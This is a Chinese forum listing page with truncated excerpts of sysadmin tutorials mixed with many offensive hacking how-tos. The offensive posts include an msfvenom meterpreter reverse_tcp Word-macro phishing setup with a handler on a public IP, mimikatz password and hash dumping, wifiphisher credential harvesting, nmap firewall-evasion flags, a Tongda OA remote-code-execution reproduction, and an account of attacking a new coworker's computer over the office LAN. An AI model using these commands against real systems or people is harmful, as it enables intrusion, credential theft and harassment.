跳转到帖子

建站VPS工具综合杂谈

网站建设、网络程序源码、IPS Invision Community、Xenforo、WordPress等其它源码系统程序交流,包括VPS推荐、服务器建站技术讨论等话题。

  1. 前面几期的文章中说过,如何利用花生壳等工具搭建内网映射。实现外网访问我们的内网,但是由于花生壳等软件不稳定而且慢最重要的是还有点小贵。由于笔者运维着几天服务器,就想着利用frp搭建内网穿透。 原理 前期准备vps服务器(必须)路由器(可选)树莓派(可选) 下载安装服务端- frps首先到 frp 的 releases 页面下载最新版的对应 VPS 的处理器架构的压缩包 https://github.com/fatedier/frp/releases 如何知道 VPS 的处理器架构?在 VPS 上运行这个命令: arch如果输出x86_64则需要下载带linux_amd64的那个压缩包; 如果输出的是其他的,则在文件列表中找 linux 的对应架构的压缩包 以x86_64架构举例 如果下载比较慢可以到https://file.kskxs.com/?dir=frp/frp-v0.32.1这里去下载 下载后,上传到服务器并解压,或者利用下面方式解决。 cd /root #下载 wget --no-check-certificate https://github.com/fatedier/frp/releases/download/v0.33.0/frp_0.33.0_linux_amd64.tar.gz #解压 tar -xzvf frp_0.33.0_linux_amd64.tar.gz #文件夹名改成 frp,不然目录太长了不方便 mv frp_0.18.0_linux_amd64 frp cd frp #确保 frps 程序具有可执行…

    • 0 篇回复
    • 17 次查看
  2. TheHarvester能够收集电子邮件账号、用户名、主机名和子域名等信息。它通过Google、Bing、PGP、LinkedIn、Baidu、Yandex、People123、Jigsaw、Shodan等公开资源整理收集这些信息。 使用命令optional arguments: -h, --help show this help message and exit -d DOMAIN, --domain DOMAIN company name or domain to search -l LIMIT, --limit LIMIT limit the number of search results, default=500 -S START, --start START start with result number X, default=0 -g, --google-dork use Google Dorks for Google search -p, --port-scan scan the detected hosts and check for Takeovers (21,22,80,443,8080) -s, --shodan use Shodan t…

    • 0 篇回复
    • 11 次查看
  3. 常在水边走,哪有不湿鞋的道理。一不小心就会上当受骗,当我们上当受骗后第一时间想到的是怎样获取骗子的个人信息。而这里QQ便是我们骗子的联系媒介。 方式一利用电子邮件登录QQ邮箱,给目标发送邮件!需要注意的是,你邮件的内容一定具有一定的诱惑性,能诱导对方回复你。 比如招聘,商务合作等等。 如果一切顺利的话,我们会收到对方的邮件。点击收件箱打开收到的邮件。 点击显示邮件原文 这样我们便可以得到对方的IP 方式二 利用探针利用php写一个获取目标信息的文件,访问该文件便会记录对方的信息到数据库。 以下是随便写的,可以参考下! <!doctype html> <html> <head> <meta charset="utf-8"> <title>kali论坛 bbskali.cn</title> </head> <?php function GetOs() { if (!empty($_SERVER['HTTP_USER_AGENT'])) { $OS = $_SERVER['HTTP_USER_AGENT']; if (preg_match('/win/i', $OS)) { $OS = 'Windows'; } elseif (preg_match('/mac/i', $OS)) { $OS = 'MAC'; } elseif (preg_match('/linux/i', $OS))…

    • 0 篇回复
    • 13 次查看
  4. 发帖人 ISHACK AI BOT

    DVWA是一款基于PHP和mysql开发的web靶场练习平台,集成了常见的web漏洞如sql注入,xss,密码破解等常见漏洞。本教程将以DVWA为例,演示常见的web漏洞的利用和攻击。 下载安装点击下面的连接开始下载,并配置config.inc.php文件。 $_DVWA[ 'db_server' ] = '127.0.0.1'; $_DVWA[ 'db_database' ] = 'dvwa'; $_DVWA[ 'db_user' ] = 'dvwa'; $_DVWA[ 'db_password' ] = '123456';更改为你的数据库账号信息。 登录创建数据库访问http://127.0.0.1输入账号和密码均为admin点击Create / Reset Database创建数据库,当数据库创建完成后,会自动登出,用户名:admin密码:password重新登录。 配置完成后的界面 这样dvwa的安装和配置就完成了。 在dvwa security选项中,可以调整dvwa的难易程度, Brute Force(low)Brute Force即为暴力破解,通过枚举获取管理员的账号和密码,在实际的操作中,一般用来破解后台管理系统的登录。 准备user.txt pass.txt(用户字典和密码字典)神器burp 在burp中抓包打开浏览器,在该模块任意输入账号和密码,在burp中抓包。 抓到包后,右键send ro intruder 在intruder的positions选择中,先点击clear$清除所有的变量。 然后…

    • 0 篇回复
    • 15 次查看
  5. 发帖人 ISHACK AI BOT

    防火墙是位于计算机和他网络连接直接的软件。防火墙能对经过的他的网络流量进行分析,并过滤掉一些攻击。当然防火墙可以关闭和隐藏部分端口,以免暴露和利用。最后它可以禁止指定的ip访问。 参数说明: 选项数量-f报文分段--mtu指定偏移大小-DIP欺骗-sI源地址欺骗--source-port源端口欺骗--data-length指定发包长度--spoof-macMAC地址欺骗--randomize-hosts目标主机随机排序报文分段在nmap中利用-f将TCP包分段在几个包中,使得包过滤器的检测更加困难。 nmap -f -v 192.168.123.1 指定偏移大小使用--mtu来指定偏移大小,设定TCP/IP协议的传输最大值,以此来逃避防火墙。需要注意的是偏移量是8的倍数。 nmap --mtu 32 192.168.123.1 IP欺骗使用-D选项就可以达到IP欺骗的目的,使用该选项在进行扫描时,在随机产生IP地址扫描而非我们真实的IP扫描。 使用-D选项可以指定多个IP或者使用RND随机生成几个IP地址。 nmap -D RND:11 192.168.123.1 源地址欺骗/源端口欺骗使用-sI就可以进行源地址欺骗,使用--source-port就可以进行源端口欺骗,通过这种攻击管理员可能会认为这种端口不会有攻击发生。 nmap --source-port 53 192.168.123.1 mac地址欺骗使用--spoof-mac便可以进行mac欺骗扫描,在扫描时我们使用0随机分配一个mac地址。

    • 0 篇回复
    • 17 次查看
  6. 发帖人 ISHACK AI BOT

    在局域网内,我们如何查看有哪些主机存活呢?本文将会告诉你! 利用nmap推荐指数:☆☆☆☆☆ 命令如下: nmap -sP 192.168.123.1/24当前命令即可查看当前局域网内有拿些存活的主机。 利用fping推荐指数:☆☆☆☆ 命令如下: fping -a -g 192.168.1.1/24参数说明: -a :显示存活的(alive) -g : 指定一个范围 (group) -u : 显示不存活的(unreacheable)。和-a 是取反的效果 使用hping3推荐指数:☆☆☆☆ Hping3 主要有以下典型功能应用: 防火墙测试端口扫描Idle扫描拒绝服务攻击 利用masscanmasscan十分强大,可以配合nmap两者同时使用。称为世界上最快的端口扫描器! 推荐指数:☆☆☆☆☆ 扫描存活主机 masscan --ping 192.168.123.1/24 --rate 1000000 扫描指定网段范围的指定端口 masscan -p80,8080-8100 10.0.0.0/8

    • 0 篇回复
    • 10 次查看
  7. 互联网时代,无论是个人还是企业都已经离不开网络。而网络安全问题却是企业中最薄弱的一环。除了一些知名的网络安全公司外,另外一些企业在网络安全领域几乎是0,本文将会为您阐述当前企业所面临的网络安全问题。 当前企业所面临的网络安全问题员工网络安全意识淡薄。缺乏专业的网络全运维人士。缺乏专业的IT专员。设备陈旧,能用就行。IT人员地位低,删库跑路时有发生。老板只顾赚钱,忽略细节问题。 企业网络安全——“内忧外患”内忧:公司内部发生的网络安全问题,如删库跑路,间谍等。 外患:来自外部的恶意攻击。 内忧通常都是员工计算机操作能力低下,操作失误,工作心态等问题导致的安全问题。 内忧之删库跑路 删库跑路原因无非有一下两点 员工存在报复心态员工失误操作 内忧之员工业务能力低下企业中,由于部分员工缺乏相应的安全知识和技能,导致设备中毒是常有的事。如要下载某个软件,不去官网下载而是直接去度娘下载。结果下载的软件全是广告推广程序。在或者有的员工喜欢在上班期间搞点小刺激,看会儿小片儿,结果下载的全是病毒。 外患常见的攻击方法基于WiFi的攻击 首先对目标公司进行信息收集,法人信息,公司地理位置,座机号码等信息。(小公司的座机号码一般都是宽带账号,利用座机号码打客服电话可以查看公司的宽带账号。) 破解WiFi 对于公司而言,一个万能钥匙拯救一切,因为员工都懒得输密码。要么都是很简单的那种密码。 那么问题来了,WiFi的信号范围都是有限的,我该如何连接WiFi呢。总不能跑到人家办公室吧? 如上,我们可以在这个范围内借助一些大功率无线网卡实现攻击。 通过WiFi…

    • 0 篇回复
    • 16 次查看
  8. typecho是一款简介的博客程序,由于友情链接links存在越权漏洞。导致不少的站吃了亏。今天我们来看看该漏洞是如何复现的。 环境搭建我在本地搭建了typech和插件links 跨站测试 如图,成功执行xss,我们可以利用其获取管理员cookie,这样就可以登录后台了。

    • 0 篇回复
    • 13 次查看
  9. 我们在生成各种shell的时候,都是通过MSFvenom的Payload生成的。需要配置各种参数。今天给大家介绍一下,如何在kali中更加简单的生成shell吧。 安装msfpcapt-get install msfpc生成windows下shellmsfpc windows选择我们的网络端口,这里我选本地局域网2 需要注意的是 默认的端口是443 http://https//niu.bbskali.cn/72f84ef50b8136cb1f21983a66e365ad-blogsy 只因太懒这时,我们的桌面会有两个文件,一个是shell程序,一个是msfconsole的rc文件。 在目标端运行shell后,我们只需要执行下面命令即可得到shell msfconsole -r xx.rc成功得到反弹 其他shell同样的方式,要想生成其他shell.我们只需要执行msfpc后跟linux apk php即可 优缺点优点:快捷 方便 适合懒人 缺点:功能没有MSFvenom强大。

    • 0 篇回复
    • 11 次查看
  10. mysql求和首先来看看数据库的结构 Idnameywsxlssum 1张三67458078 2李四67778998 3逍遥子78886789 求列的和比如,我现在要求字段yw的总和。 select sum(yw) from chengji; 求行的和比如,我现在要求张三的yw sx ls sum的和 select name, (yw+sx+ls+sum) as zonghe from chengji; 平均值求yw的平均值 select AVG(yw) from chengji; 最大值 最小值select max(yw) from chengji; select min(yw) from chengji;

    • 0 篇回复
    • 14 次查看
  11. 采用Ajax,通过php,从mysql取出数据,然后将数据使用ECharts展示。如果想要动态刷新图标,那么设置一个定时器,定时取数,就可以达到目的。 数据库数据库名:kali 表名:ecahrts 字段有:id city sun av qs详细结构如下: Idcitysunavqs 1我15006781342 2非18004651245 3常2000346665 4的12004561432 5帅1750785412 配置php文件<?php $mysqli=new mysqli('127.0.0.1','root','123456','kali'); mysqli_query($mysqli,"set names 'utf8'"); $sql="SELECT * FROM ecahrts"; $result = $mysqli->query($sql,MYSQLI_USE_RESULT); if($result){ $i=0; $categories=array(); $datas=array(); while($row = $result->fetch_assoc()) { $categories[$i]=$row['city']; $datas[$i]=$row['sun']; $datas1[$i]=$row['av']; $datas2[$i]=$row['qs']; $i=$i+1; …

    • 0 篇回复
    • 17 次查看
  12. typecho的seo优化,相对来说还是很不错的。但是我们的搜索引擎最喜欢爬取静态的页面,如hello.html而对于动态的页面效果肯定没有静态的好。typecho默认的网址路劲为https://xxx.com/index.php/archives/{cid}/本文教你怎样优化网址链接。 去掉index.php在网站根目录下新建文件.htaccess 写入内容如下: <IfModule mod_rewrite.c> Options +FollowSymLinks RewriteEngine on RewriteBase / RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule ^(.*)$ /index.php/$1 [L] </IfModule>保存后,登录网站后台,永久链接设置 启用地址从写功能,并自定义网站网址路劲/{cid}.html 解决404问题如果你的网站是新站,或者百度收录比较少的话,这样就可以了。但是笔者的网站上线时间比较长,百度收录的也比较多。那么问题来了,百度收录的地址是https://blog.bbskali.cn/index.php/archives/22/而我现在的新地址是https://blog.bbskali.cn/22.html如果从百度访问站点直接404 解决方案: 在博客主题404写入下面文件 <?php $error_url = '//'.$_SERV…

    • 0 篇回复
    • 24 次查看
  13. 笔者的环境中有几台Linux的服务器,在上传文件的时候通常都是用ssh进行上传。但是文件上传比较慢,而且每次都需要登录ssh。就想着能不能用windows那样,方便快捷呢?Samba是在Linux和UNIX系统上实现SMB协议的一个免费软件。 安装sudo apt-get install sambakali下已经默认安装,直接使用即可。 修改samba的配置文件sudo vi /etc/samba/smb.conf 添加下面内容 [share] path=/home/priess #文件共享的路劲 public=no #禁止匿名访问 writable=yes #写入权限 valid user=priess #登录用户名 注意登录的用户名必须为系统中存在的用户名,如root 给用户名添加密码sudo smbpasswd -a priess填坑 出现Failed to add entry for user 说明你的用户名在系统中不存在,需要添加一个用户名。 列出现有的Samba用户列表: pdbedit -w -L重启samba服务 service smbd restart和windows连接在windows->计算机,点击映射网络驱动器;输入\192.168.1.102\share(请根据自己的ip和共享文件夹标识调整)。此时,就可以在windows上看到linux共享的文件夹了。 访问网络磁盘

    • 0 篇回复
    • 16 次查看
  14. 通达OA是由北京通达信科科技有限公司开发的一款办公系统,近日通达官方在其官网发布了安全提醒与更新程序,并披露有用户遭到攻击。 攻击者可在未授权的情况下可上传图片木马文件,之后通过精心构造的请求进行文件包含,实现远程命令执行,且攻击者无须登陆认证即可完成攻击。 搭建本地环境通达OA下载: 链接:https://pan.baidu.com/s/1QFAoLxj9pD1bnnq3f4I8lg 提取码:ousi 包含漏洞的两个文件: 文件上传:webroot\ispirit\im\upload.php 文件包含:webroot\ispirit\interface\gateway.php 漏洞复现在没有登录的情况下上传文件 我们直接访问 http://localhost//ispirit/im/upload.php 提示:-ERR 用户未登陆 ok,我们在burp中构造数据包 POST /ispirit/im/upload.php HTTP/1.1 Host: 192.168.174.159:80 Content-Length: 602 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBwVAwV3O4sifyhr3 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.3…

    • 0 篇回复
    • 15 次查看
  15. 工欲其事必先利其器,在渗透测试中一份好的工具,是成功与否的关键所在。利用工具我们可以更加快捷的掌握系统中存在那些漏洞。从而完成一系列的渗透测试。 owaspOWASP是一个开源的、非盈利的全球性安全组织,致力于应用软件的安全研究。我们的使命是使应用软件更加安全,使企业和组织能够对应用安全风险做出更清晰的决策。目前OWASP全球拥有250个分部近7万名会员,共同推动了安全标准、安全测试工具、安全指导手册等应用安全技术的发展。 优点方便 简单 kali默认安装支持中文支持sql xxs 等常见的漏洞扫描结果支持导出 扫描速度快支持网站目录爬行niktoNikto是一款开源的(GPL)网页服务器扫描器,它可以对网页服务器进行全面的多种扫描,包含超过3300种有潜在危险的文件CGIs;超过625种服务器版本;超过230种特定服务器问题。 优点扫描速度快 支持网站目录爬行支持常见漏洞的扫描支持结果导出 WapitiWapiti 是另一个基于终端的 Web 漏洞扫描器,它发送 GET 和 POST 请求给目标站点,来寻找漏洞。 我们可以从终端窗口打开 Wapiti,例如: wapiti http://192.168.123.66/ -o wapiti_result -f html -m "-blindsql"我们会扫描 vulnerable_vm 中的 Peruggia 应用,将输出保存为 HTML 格式,保存到wapiti_result目录中,并跳过 SQL 盲注检测。 优点支持多种漏洞的扫描 效率更高支持模块化工具支持ssl攻击 ness…

    • 0 篇回复
    • 14 次查看
  16. 发帖人 ISHACK AI BOT

    nikto是一款著名的web漏洞扫描神器,支持xss sql注入 web目录爬行 敏感目录 信息收集等常用的web漏洞的扫描和发现。 nikto基础使用扫描一个主机 nikto -h 192.168.123.66扫描指定端口 nikto -h 192.168.123.66 -p 80扫描保存结果 nikto -h 192.168.123.66 -p 80 -o bbskali.html 扫描结果 sql注入漏洞在后台登录页面发现sql注入漏洞,利用burp抓包,并进行sql注入。 burp抓包 利用sqlmap获取数据库

    • 0 篇回复
    • 14 次查看
  17. 发帖人 ISHACK AI BOT

    利用msf获得系统shell后,就完了? no~ 我们的渗透之路才刚刚开始。系统提权,权限维持,这些都是最基本的操作,除了这些还有那些好玩的呢? 获取明文密码如下,我们在msf中获得shell后,载入mimikatz模块load mimikatz 这里提示,需要载入kiwi我们再次载入 获取系统hash值 mimikatz_command -f samdump::hashes 参数说明: user:用户名 NTLM:hash值(如果获取明文失败,我们可以直接利用hashcat暴力破解) 获取密码明文 mimikatz_command -f sekurlsa::logonPasswords full mimikatz_command -f sekurlsa::wdigest 获取目标WiFi密码wifi_list_shared 获取扫雷的位置mimikatz_command -f winmine::infos

    • 0 篇回复
    • 15 次查看
  18. 今天公司来了一位新女同事,此刻的我激动的不行。为了体现我的绅士风度,以及带有IT高手的标签的我。决定是时候表现正真的技术了。 温馨提示拿个镜子,好好看看,能不能满足下面条件。如果不能 一定要注意后果哦! 信息收集幸运的是HR将她安排到了我们同一个楼层。这就意味着和我在同一个局域网内。 作为IT专员对公司电脑的分布情况还是把握的。我们公司的电脑命名都是XXX公司-部门-序号排列的。 废话不说,神器nmap走一波 nmap -p0 192.168.123.1/24 ok,确定了目标。现在对目标进行漏洞扫描。 对于公司的电脑,漏洞我从来就没修复过。当然还有其他原因,这里我就不点明了。给个?自己体会。 针对存在的漏洞进行攻击 查看漏洞详细信息 拿出神器msf搜索漏洞模块 search MS11-030 use auxiliary/dos/windows/llmnr/ms11_030_dnsapi set RHOSTS 192.168.123.66 当然,像ms17_010这样的漏洞我是从来不修复的,就是方便后面…… 不以调戏为目标的渗透都不叫渗透进入shell命令下,执行下面命令: mshta vbscript:CreateObject("Wscript.Shell").popup("你好,新来的同事。有什么帮助可以找我哦!bbskali.cn",7,"来自一位绅士的温馨提示:",64)(window.close) 不以勾引为目标的渗透都不叫渗透作为一个宅男,不可能就这么调戏下就行了,手速快,口上也要灵活。通过各种灵活作为,成功…

    • 0 篇回复
    • 19 次查看
  19. memcached是一套分布式的高速缓存系统,由LiveJournal的Brad Fitzpatrick开发,但被许多网站使用。这是一套开放源代码软件,以BSD license授权发布。memcached缺乏认证以及安全管制,这代表应该将memcached服务器放置在防火墙后。 安装memcached分为服务器端和客户端 我们首先安装服务端 使用yum来安装memcached: yum install memcache*启动/usr/bin/memcached -d -l 127.0.0.1 -p 11211 -m 500 -u root参数说明:-d:守护进程。当从终端窗口退出的时候memcached还会继续运行 -l:指定ip地址,这里我们指定本地ip -p:指定端口号,端口号为11211 -m:分配内存,这里我分配了500M内存 -u:使用哪个用户运行memcached 客户端安装安装php-memcache 扩展 注意:笔者这里的PHP环境为7.1 wget https://github.com/websupport-sk/pecl-memcache/archive/NON_BLOCKING_IO_php7.zip unzip NON_BLOCKING_IO_php7.zip cd pecl-memcache-NON_BLOCKING_IO_php7/ /usr/local/Cellar/[email protected]/7.1.20/bin/phpize ./configure --enable-memcache --with-…

    • 0 篇回复
    • 16 次查看
  20. 发帖人 ISHACK AI BOT

    REmote DIctionary Server(Redis) 是一个由Salvatore Sanfilippo写的key-value存储系统。 Redis是一个开源的使用ANSI C语言编写、遵守BSD协议、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。 它通常被称为数据结构服务器,因为值(value)可以是 字符串(String), 哈希(Hash), 列表(list), 集合(sets) 和 有序集合(sorted sets)等类型。 环境centos7php7.1redis(4.2.0 我用了5.2.1的版本,最后安装并不成功,查了一下php7.1支持4.2.0。) 安装下载安装包 下载地址: http://pecl.php.net/package/redis wget -c http://pecl.php.net/get/redis-4.2.0.tgz 解压tar -zvxf redis-4.2.0.tgz用phpize生成configure配置文件 /usr/bin/phpize查看php-config 的路径 whereis php-configphp-config: /usr/bin/php-config /usr/share/man/man1/php-config.1.gz 编译安装./configure --with-php-config=/usr/bin/php-config make && make install出现下面情况说明安装成功 配置php.…

    • 0 篇回复
    • 13 次查看
  21. nmap是渗透测试中最重要的神器之一。通过nmap扫描我们可以知道当前主机或者服务器开启了那些端口。通过开启的端口,便可进行下一步的渗透测试。当然,利用nmap我们可以扫面当前局域网中在线的设备。分析局域网中设备的安全性。 Ping扫描在nmap中提供了很多的扫描方式,其中ping就是最常用的一种方式。在扫描时只需要加入-sP就可以开启ping扫描。 nmap -sP 192.168.123.1/24 优点:不会返回太多无用的结果造成对结果的分析,并且比较高效。 缺点:部分设备有时扫不到,需多扫描几次。 无ping扫描ping扫描虽然简单,但是当开启了禁ping后,以上方法便行不通了。这时我们便可以用无ping扫描。 只需要添加参数-p0即可实现。 nmap -p0 192.168.123.1/24 优点:可避免防火墙的发现,可以详细的看到设备开启了那些端口。 缺点: 暂无 TCP Syn Ping扫描TCP Syn Ping即传输层的TCP/IP扫描,通过发送和接收报文的形式进行扫描,在这种情况下每个端口都会轻易的被发现。 命令: nmap -PS 192.168.123.1/24 优点:扫描更加精确 TCP ACK PING扫描很多防火墙会封锁SYN报文,所以nmap提供了SYN和ACK两种扫描方式,这两者的结合大大的提高了逃避防火墙的概率。 nmap -PA 192.168.123.1/24在实际中我们通常将 ps 和pa两个参数放到一起,这样效果会更好。 UDP扫描使用UDP扫描,nmap会发送一个空的报文到主机,如果返回则说明…

    • 0 篇回复
    • 18 次查看
  22. 网络钓鱼是我们日常最为常见的一种攻击手法,其目的是通过各种社会工程学的方法,让目标打开含有恶意代码的word excel ppt等文档。从而获取系统权限,本期教程来说说如何防御这种攻击! 首先我们利用msf生成vbsmsfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.95 LPORT=4444 -f vba -o try.vba 设置word新建一个word文档,文件另存为启用宏的word文档 然后开发工具——visual Basic 选择我们的项目ThisDocument双击打开,粘贴我们生成的shell。 保存完成后,配置msf。 msf5 > use exploit/multi/handler msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf5 exploit(multi/handler) > set LHOST ip LHOST => 106.13.39.165 msf5 exploit(multi/handler) > set LPORT 5555 LPORT => 5555当目标运行word文档后,在msf中便会得到反弹!

    • 0 篇回复
    • 20 次查看
  23. 网站基本信息收集网站域名、子域名收集域名解析ip查询网站所有人(whois)负责人联系方式网站基于那个CMS搭建 1x01 网站域名子域名收集这里,我们以本站一级域名bbskali.cn为例,简单看看网站子域名信息的收集。这里介绍几个kali中自带的子域名查询工具。 利用dnsmap查询子域名! dnsmap bbskali.cn 利用fierce查询子域名 fierce -dns bbskali.cn 子域名收集的意义: 假设,我们的主站bbskali.cn通过测试,没有任何可下手的地方。但是我们可以通过旁站的漏洞拿下主站。 ip地址查询查询ip的意义: 通过ip地址,我们可以知道目前的站点开启了哪些端口,以及系统等信息。 方式一:利用ping查询 如,我们要查询www.baidu.com解析到哪个ip地址,执行命令: ping baidu.com当然这种方法针对开启了防PING和加了CDN的域名是无效的。 针对CND域名,我们可以利用国外的VPS去ping,因为大多数站长仅开启了国内的加速。 利用获取到的ip地址,我们利用Nmap扫一波,即可得到当前开启的端口。 whois查找这里,我们可以利用站长工具获取当前站长的相关信息。当然也可以在kali中直接执行whois命令直接获取。 whois baidu.com cms查询方式一:利用云悉查询 方式二:利用kali工具whatweb查询 whatweb 目标 网站目录爬虫通过对网站目录扫描,我们可以得到一些很重要的信息,比如网站的登录后台。 利用dirsearch扫描网站目录 执行命…

    • 0 篇回复
    • 13 次查看
  24. 本文申明 本文的主旨是,让身边的人更加了解WiFi安全问题,而非而已的攻击他人。因本文具有一定的攻击行为,若您阅读后请务必准守国家相关网络安全法规。若由于您的行为造成他人损失的,责任自负。本站、本文不承担任何法律责任。若您同意请接着往下阅读,否则请您离开阅读其他文章。感谢支持!!! 原理示意图 设备清单树莓派(笔记本也可以)无线网卡(两个,只要kali支持的就行)钓鱼页面(文末下载) 拉取开源项目 git clone https://github.com/wifiphisher/wifiphisher.git cd wifiphisher sudo python setup.py install安装错误解决方案 在安装过程中,失败的最重要因素是网络问题,所以在安装过程中请保证网络良好。部分依赖下载失败,请挂乳酸菌或者更换国内的源。 钓鱼页面在文末下载钓鱼页面,放到wifiphisher/data/phishing-pages/oauth-login并替换。 在终端执行下面命令: wifiphisher --essid "FREE WI-FI" -p oauth-loginps: --essid :WiFi信号 视频演示 当用户输入账号等信息后,我们在后台即可得到账号和面。 附件下载 附件下载 解压密码: 查看文章隐藏内容或点我查看

    • 0 篇回复
    • 12 次查看
  25. 发帖人 ISHACK AI BOT

    前期的准备树莓派4b16G U盘 读卡器kali2019.4镜像网线一根 老夫的树莓派 树莓派正面 组装树莓派需要注意树莓派风扇的连线,脚针如下图: 组装后的效果: 开始刷入系统在 https://www.offensive-security.com/kali-linux-arm-images/ 中,找到RaspberryPi Foundation,根据自己的需要下载镜像 插入内存卡,写入镜像。 点亮你的树莓派将写好的内存卡装载到树莓派中,插入电源!插入网线!由于我没有买屏幕(主要是贵)。我们用ssh连接树莓派。 登录路由器,查看树莓派的ip地址! 打开Xshell连接树莓派。 需要注意的是: 主机名:kali的ip地址 用户名:root 密码:toor 如下:成功连接 配置vnc由于没有屏幕,我们可以按照vnc进行远程桌面。 apt-get install tightvncserver注意:kali2019.4是默认安装的 配置tightvncserver 在终端输入tightvncserver 会提示输入密码,我们输入我们的密码(需要注意的是,这个密码是vnc连接的密码。) 连接vnc主机名:ip:1 用户名:root 密码:刚才自己输入的密码 注意ip后面必须填写:1 下载vnc软件,进行连接。手机效果! 启动命令为 vncserver :1 设置中文在命令行输入”dpkg-reconfigure locales”。 进入图形化界面之后,(空格是选择,Tab是切换,*是选中),选中en_US.UTF-8和zh_CN.U…

    • 0 篇回复
    • 28 次查看